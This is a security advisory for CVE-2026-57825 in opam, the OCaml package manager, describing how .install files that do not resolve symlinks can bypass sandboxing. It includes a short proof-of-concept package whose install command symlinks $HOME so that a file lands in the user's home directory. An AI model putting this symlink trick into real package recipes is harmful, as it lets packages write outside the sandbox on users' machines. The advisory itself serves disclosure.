PT-2026-56690 · Git · Pam-Devel
Publicado
2026-07-07
·
Atualizado
2026-07-07
·
CVE-2026-57825
CVSS v3.1
5.7
Média
| Vetor | AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N |
Summary
Installing files through
.install files do not check symlinks resolution of the target path, and so can bypass sandboxing.Exploit
Let's imagine a
test package whose test.install file looks like the following:share root: [
"test" {"blah/pwnd"}
]and
test.opam file:opam-version: "2.0"
install: ["sh" "-c" "ln -s "$HOME" "%{share}%/blah""]Installing this package will write the
pwnd file in the home directory of the current user, bypassing sandboxing.Timeline
- 2026-05-15: Kate reported the issue to the rest of the opam team and the OCaml Security team
- 2026-06-22: Nathan wrote a fix which was then reviewed by Raja and refined over the next 2 weeks
- 2026-07-08: opam 2.5.2 was released with the fix
Correção
Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾
Identificadores relacionados
Produtos afetados
Pam-Devel